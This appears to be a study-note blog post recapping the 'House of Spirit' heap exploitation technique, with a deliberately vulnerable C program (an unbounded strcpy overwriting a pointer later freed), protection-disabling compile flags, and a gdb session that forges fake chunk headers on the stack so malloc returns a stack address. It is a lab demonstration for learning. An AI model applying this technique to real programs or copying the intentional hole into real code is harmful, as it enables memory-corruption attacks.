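Malloc Maleficarum recap
1.hos recap
hos forges a heap chunk: an address on the stack is passed to free, and the next malloc is then served from the fastbin with that chunk (on the stack), which contains the return address.
Code source
I ran into problems reproducing it directly. I asked joker, and it is probably a gcc version issue that puts the local variables at different positions. So I just brute-force it with set inside gdb; it is only a demo anyway, and learning the principle is enough.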
# muhe @ ubuntu in ~/Desktop/study [2:54:31]
$ ls
hos hos.c
# muhe @ ubuntu in ~/Desktop/study [2:54:33]
$ cat hos.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void fvuln(char *str1, int age)
{
    char *ptr1;
    int local_age;
    char name[32];
    char *ptr2;

    local_age = age;

    ptr1 = (char *) malloc(256);
    printf("\nPTR1 = [ %p ]", ptr1);
    strcpy(name, str1);                 /* unbounded copy: runs past name[] into the adjacent locals, including ptr1 */
    printf("\nPTR1 = [ %p ]\n", ptr1);

    free(ptr1);                         /* frees whatever value ptr1 holds after the copy */

    ptr2 = (char *) malloc(40);
    snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
    printf("\n%s\n", ptr2);
}

int main(int argc, char *argv[])
{
    int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};

    if (argc == 3)
        fvuln(argv[1], atoi(argv[2]));

    return 0;
}
# muhe @ ubuntu in ~/Desktop/study [2:54:35]
$ gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos -g
# muhe @ ubuntu in ~/Desktop/study [2:54:45]
$ gdb ./hos -q
Reading symbols from ./hos...done.
gdb-peda$ pdisass fvuln
Dump of assembler code for function fvuln:
0x080484fb <+0>: push ebp
0x080484fc <+1>: mov ebp,esp
0x080484fe <+3>: sub esp,0x2c
0x08048501 <+6>: mov eax,DWORD PTR [ebp+0xc]
0x08048504 <+9>: mov DWORD PTR [ebp-0x4],eax
0x08048507 <+12>: push 0x100
0x0804850c <+17>: call 0x80483b0 <malloc@plt>
0x08048511 <+22>: add esp,0x4
0x08048514 <+25>: mov DWORD PTR [ebp-0x8],eax
0x08048517 <+28>: push DWORD PTR [ebp-0x8]
0x0804851a <+31>: push 0x8048660
0x0804851f <+36>: call 0x8048380 <printf@plt>
0x08048524 <+41>: add esp,0x8
0x08048527 <+44>: push DWORD PTR [ebp+0x8]
0x0804852a <+47>: lea eax,[ebp-0x2c]
0x0804852d <+50>: push eax
0x0804852e <+51>: call 0x80483a0 <strcpy@plt>
0x08048533 <+56>: add esp,0x8
0x08048536 <+59>: push DWORD PTR [ebp-0x8]
0x08048539 <+62>: push 0x804866f
0x0804853e <+67>: call 0x8048380 <printf@plt>
0x08048543 <+72>: add esp,0x8
0x08048546 <+75>: push DWORD PTR [ebp-0x8]
0x08048549 <+78>: call 0x8048390 <free@plt>
0x0804854e <+83>: add esp,0x4
0x08048551 <+86>: push 0x28
0x08048553 <+88>: call 0x80483b0 <malloc@plt>
0x08048558 <+93>: add esp,0x4
0x0804855b <+96>: mov DWORD PTR [ebp-0xc],eax
0x0804855e <+99>: push DWORD PTR [ebp-0x4]
0x08048561 <+102>: lea eax,[ebp-0x2c]
0x08048564 <+105>: push eax
0x08048565 <+106>: push 0x804867f
0x0804856a <+111>: push 0x27
0x0804856c <+113>: push DWORD PTR [ebp-0xc]
0x0804856f <+116>: call 0x80483d0 <snprintf@plt>
0x08048574 <+121>: add esp,0x14
0x08048577 <+124>: push DWORD PTR [ebp-0xc]
0x0804857a <+127>: push 0x8048692
0x0804857f <+132>: call 0x8048380 <printf@plt>
0x08048584 <+137>: add esp,0x8
0x08048587 <+140>: nop
0x08048588 <+141>: leave
0x08048589 <+142>: ret
End of assembler dump.
gdb-peda$ b *0x0804850c
Breakpoint 1 at 0x804850c: file hos.c, line 14.
gdb-peda$ b *0x0804852e
Breakpoint 2 at 0x804852e: file hos.c, line 16.
gdb-peda$ b *0x08048549
Breakpoint 3 at 0x8048549: file hos.c, line 19.
gdb-peda$ b *0x08048553
Breakpoint 4 at 0x8048553: file hos.c, line 21.
gdb-peda$ r aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc 20
Starting program: /home/muhe/Desktop/study/hos aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc 20
[----------------------------------registers-----------------------------------]
EAX: 0x14
EBX: 0x0
ECX: 0x0
EDX: 0x14
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0x100
EIP: 0x804850c (<fvuln+17>: call 0x80483b0 <malloc@plt>)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048501 <fvuln+6>: mov eax,DWORD PTR [ebp+0xc]
0x8048504 <fvuln+9>: mov DWORD PTR [ebp-0x4],eax
0x8048507 <fvuln+12>: push 0x100
=> 0x804850c <fvuln+17>: call 0x80483b0 <malloc@plt>
0x8048511 <fvuln+22>: add esp,0x4
0x8048514 <fvuln+25>: mov DWORD PTR [ebp-0x8],eax
0x8048517 <fvuln+28>: push DWORD PTR [ebp-0x8]
0x804851a <fvuln+31>: push 0x8048660
Guessed arguments:
arg[0]: 0x100
arg[1]: 0x0
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x100
0004| 0xffffd520 --> 0x0
0008| 0xffffd524 --> 0xffffd5c4 --> 0x61b64d7e
0012| 0xffffd528 --> 0xf7fe76db (add esi,0x15925)
0016| 0xffffd52c --> 0x0
0020| 0xffffd530 --> 0xf7e39c45 (<strtol+5>: add eax,0x17f3bb)
0024| 0xffffd534 --> 0xf7e37040 (<atoi+16>: add esp,0x1c)
0028| 0xffffd538 --> 0xffffd851 --> 0x58003032 ('20')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x0804850c in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:14
14 ptr1 = (char *) malloc(256);
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd520 --> 0x0
EBX: 0x0
ECX: 0x7fffffec
EDX: 0xf7fba870 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd518 --> 0xffffd520 --> 0x0
EIP: 0x804852e (<fvuln+51>: call 0x80483a0 <strcpy@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048527 <fvuln+44>: push DWORD PTR [ebp+0x8]
0x804852a <fvuln+47>: lea eax,[ebp-0x2c]
0x804852d <fvuln+50>: push eax
=> 0x804852e <fvuln+51>: call 0x80483a0 <strcpy@plt>
0x8048533 <fvuln+56>: add esp,0x8
0x8048536 <fvuln+59>: push DWORD PTR [ebp-0x8]
0x8048539 <fvuln+62>: push 0x804866f
0x804853e <fvuln+67>: call 0x8048380 <printf@plt>
Guessed arguments:
arg[0]: 0xffffd520 --> 0x0
arg[1]: 0xffffd828 ('a' <repeats 32 times>, "bbbbcccc")
[------------------------------------stack-------------------------------------]
0000| 0xffffd518 --> 0xffffd520 --> 0x0
0004| 0xffffd51c --> 0xffffd828 ('a' <repeats 32 times>, "bbbbcccc")
0008| 0xffffd520 --> 0x0
0012| 0xffffd524 --> 0xffffd5c4 --> 0x61b64d7e
0016| 0xffffd528 --> 0xf7fe76db (add esi,0x15925)
0020| 0xffffd52c --> 0x0
0024| 0xffffd530 --> 0xf7e39c45 (<strtol+5>: add eax,0x17f3bb)
0028| 0xffffd534 --> 0xf7e37040 (<atoi+16>: add esp,0x1c)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x0804852e in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:16
16 strcpy(name, str1);
gdb-peda$ c
Continuing.
PTR1 = [ 0x804b008 ]
PTR1 = [ 0x63636363 ]
[----------------------------------registers-----------------------------------]
EAX: 0x17
EBX: 0x0
ECX: 0x7fffffeb
EDX: 0xf7fba870 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c ("cccc", 'a' <repeats 32 times>, "bbbbcccc")
EIP: 0x8048549 (<fvuln+78>: call 0x8048390 <free@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804853e <fvuln+67>: call 0x8048380 <printf@plt>
0x8048543 <fvuln+72>: add esp,0x8
0x8048546 <fvuln+75>: push DWORD PTR [ebp-0x8]
=> 0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
Guessed arguments:
arg[0]: 0x63636363 ('cccc')
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c ("cccc", 'a' <repeats 32 times>, "bbbbcccc")
0004| 0xffffd520 ('a' <repeats 32 times>, "bbbbcccc")
0008| 0xffffd524 ('a' <repeats 28 times>, "bbbbcccc")
0012| 0xffffd528 ('a' <repeats 24 times>, "bbbbcccc")
0016| 0xffffd52c ('a' <repeats 20 times>, "bbbbcccc")
0020| 0xffffd530 ('a' <repeats 16 times>, "bbbbcccc")
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 3, 0x08048549 in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x14) at hos.c:19
19 free(ptr1);
gdb-peda$ x/10wx $esp
0xffffd51c: 0x63636363 0x61616161 0x61616161 0x61616161
0xffffd52c: 0x61616161 0x61616161 0x61616161 0x61616161
0xffffd53c: 0x61616161 0x62626262
gdb-peda$ set *(int*)0xffffd51c = 0xffffd530
gdb-peda$ x/10wx 0xffffd530 - 8
0xffffd528: 0x61616161 0x61616161 0x61616161 0x61616161
0xffffd538: 0x61616161 0x61616161 0x62626262 0x63636363
0xffffd548: 0x00000000 0xffffd588
gdb-peda$ set *(int*)0xffffd528=0x0
gdb-peda$ set *(int*)0xffffd52c=0x31
gdb-peda$ x/10wx 0xffffd530 - 8 + 0x30
0xffffd558: 0x00000014 0x00000000 0x00000000 0x00000000
0xffffd568: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffd578: 0x0000000a 0x00000000
gdb-peda$ set *(int*)0xffffd558 = 0x31
gdb-peda$ set *(int*)0xffffd55c = 0x30
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xf7fb9000 --> 0x1aedb0
EDX: 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0xffffd530 --> 0x0
EIP: 0x804854e (<fvuln+83>: add esp,0x4)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048543 <fvuln+72>: add esp,0x8
0x8048546 <fvuln+75>: push DWORD PTR [ebp-0x8]
0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
=> 0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0xffffd530 --> 0x0
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804854e 19 free(ptr1);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xf7fb9000 --> 0x1aedb0
EDX: 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd520 ("aaaaaaaa")
EIP: 0x8048551 (<fvuln+86>: push 0x28)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048546 <fvuln+75>: push DWORD PTR [ebp-0x8]
0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
0x804854e <fvuln+83>: add esp,0x4
=> 0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd520 ("aaaaaaaa")
0004| 0xffffd524 ("aaaa")
0008| 0xffffd528 --> 0x0
0012| 0xffffd52c --> 0x31 ('1')
0016| 0xffffd530 --> 0x0
0020| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0024| 0xffffd538 ("aaaaaaaabbbbcccc")
0028| 0xffffd53c ("aaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
21 ptr2 = (char *) malloc(40);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xf7fb9000 --> 0x1aedb0
EDX: 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0x28 ('(')
EIP: 0x8048553 (<fvuln+88>: call 0x80483b0 <malloc@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048549 <fvuln+78>: call 0x8048390 <free@plt>
0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
=> 0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
0x8048561 <fvuln+102>: lea eax,[ebp-0x2c]
Guessed arguments:
arg[0]: 0x28 ('(')
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x28 ('(')
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 4, 0x08048553 in fvuln (str1=0xffffd828 'a' <repeats 32 times>, "bbbbcccc", age=0x31) at hos.c:21
21 ptr2 = (char *) malloc(40);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd530 --> 0x0
EBX: 0x0
ECX: 0xf7fb9780 --> 0x0
EDX: 0xffffd530 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd51c --> 0x28 ('(')
EIP: 0x8048558 (<fvuln+93>: add esp,0x4)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x804854e <fvuln+83>: add esp,0x4
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
=> 0x8048558 <fvuln+93>: add esp,0x4
0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
0x8048561 <fvuln+102>: lea eax,[ebp-0x2c]
0x8048564 <fvuln+105>: push eax
[------------------------------------stack-------------------------------------]
0000| 0xffffd51c --> 0x28 ('(')
0004| 0xffffd520 ("aaaaaaaa")
0008| 0xffffd524 ("aaaa")
0012| 0xffffd528 --> 0x0
0016| 0xffffd52c --> 0x31 ('1')
0020| 0xffffd530 --> 0x0
0024| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0028| 0xffffd538 ("aaaaaaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048558 21 ptr2 = (char *) malloc(40);
gdb-peda$ ni
[----------------------------------registers-----------------------------------]
EAX: 0xffffd530 --> 0x0
EBX: 0x0
ECX: 0xf7fb9780 --> 0x0
EDX: 0xffffd530 --> 0x0
ESI: 0xf7fb9000 --> 0x1aedb0
EDI: 0xffffd584 --> 0xf7fb9000 --> 0x1aedb0
EBP: 0xffffd54c --> 0xffffd588 --> 0x0
ESP: 0xffffd520 ("aaaaaaaa")
EIP: 0x804855b (<fvuln+96>: mov DWORD PTR [ebp-0xc],eax)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048551 <fvuln+86>: push 0x28
0x8048553 <fvuln+88>: call 0x80483b0 <malloc@plt>
0x8048558 <fvuln+93>: add esp,0x4
=> 0x804855b <fvuln+96>: mov DWORD PTR [ebp-0xc],eax
0x804855e <fvuln+99>: push DWORD PTR [ebp-0x4]
0x8048561 <fvuln+102>: lea eax,[ebp-0x2c]
0x8048564 <fvuln+105>: push eax
0x8048565 <fvuln+106>: push 0x804867f
[------------------------------------stack-------------------------------------]
0000| 0xffffd520 ("aaaaaaaa")
0004| 0xffffd524 ("aaaa")
0008| 0xffffd528 --> 0x0
0012| 0xffffd52c --> 0x31 ('1')
0016| 0xffffd530 --> 0x0
0020| 0xffffd534 ('a' <repeats 12 times>, "bbbbcccc")
0024| 0xffffd538 ("aaaaaaaabbbbcccc")
0028| 0xffffd53c ("aaaabbbbcccc")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0804855b 21 ptr2 = (char *) malloc(40);
gdb-peda$
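The gdb `set` commands above only make sense against the sanity checks free() runs before it links a chunk into a fastbin. The block below is an added example, not code from the original post or from glibc: a simplified model of those checks for a 32-bit build, run over a constructed copy of the two header words the session touches (0xffffd52c and 0xffffd55c). The constants, `SYSTEM_MEM`, and the names `check_free` and `try_sizes` are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* 32-bit glibc constants (SIZE_SZ = 4). SYSTEM_MEM is an assumed value for
 * av->system_mem; the page does not show it. */
#define SIZE_SZ    4u
#define ALIGN      8u
#define MINSIZE    16u
#define MAX_FAST   64u
#define SYSTEM_MEM 0x21000u
#define FLAGS      7u          /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

enum verdict { FAST_OK, BAD_POINTER, BAD_SIZE, OTHER_PATH, BAD_NEXT_SIZE };

/* Constructed stand-in for the stack words starting at 0xffffd528. */
struct window { uint32_t base; uint32_t words[24]; };

static uint32_t rd(const struct window *w, uint32_t addr)
{
    uint32_t i = (addr - w->base) / 4;
    return i < 24 ? w->words[i] : 0;       /* outside the window reads as 0 */
}

/* Simplified model of what free(mem) tests before a chunk enters a fastbin. */
enum verdict check_free(const struct window *w, uint32_t mem)
{
    uint32_t p = mem - 2 * SIZE_SZ;        /* header sits 8 bytes below mem */
    uint32_t field = rd(w, p + SIZE_SZ);   /* raw size field, flag bits included */
    uint32_t size = field & ~FLAGS;

    if (p % ALIGN != 0 || p > (uint32_t)-size) return BAD_POINTER;
    if (size < MINSIZE) return BAD_SIZE;
    if ((field & 6u) || size > MAX_FAST) return OTHER_PATH;  /* not the fastbin path */
    uint32_t next = rd(w, p + size + SIZE_SZ);
    if (next <= 2 * SIZE_SZ || (next & ~FLAGS) >= SYSTEM_MEM) return BAD_NEXT_SIZE;
    return FAST_OK;
}

/* Build the window with a given size field and next-chunk size field,
 * then run the checks on the pointer used in the session (0xffffd530). */
enum verdict try_sizes(uint32_t size_field, uint32_t next_field)
{
    struct window w = { 0xffffd528u, {0} };
    w.words[1] = size_field;               /* 0xffffd52c */
    w.words[(0x30 + 4) / 4] = next_field;  /* 0xffffd55c = 0xffffd528 + 0x30 + 4 */
    return check_free(&w, 0xffffd530u);
}

int main(void)
{
    printf("%d %d %d\n",
           (int)try_sizes(0x61616161u, 0),   /* right after strcpy: rejected */
           (int)try_sizes(0x31u, 0),         /* size fixed, next size still 0 */
           (int)try_sizes(0x31u, 0x30u));    /* both words as set in gdb */
    return 0;
}
```

In this model the chunk is accepted only once both the size field and the next chunk's size field hold plausible values, which is what these checks are meant to enforce against a pointer that did not come from malloc.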
2.hop TBU
3.hom TBU
4.hof TBU
5.hol TBU
6.hoc TBU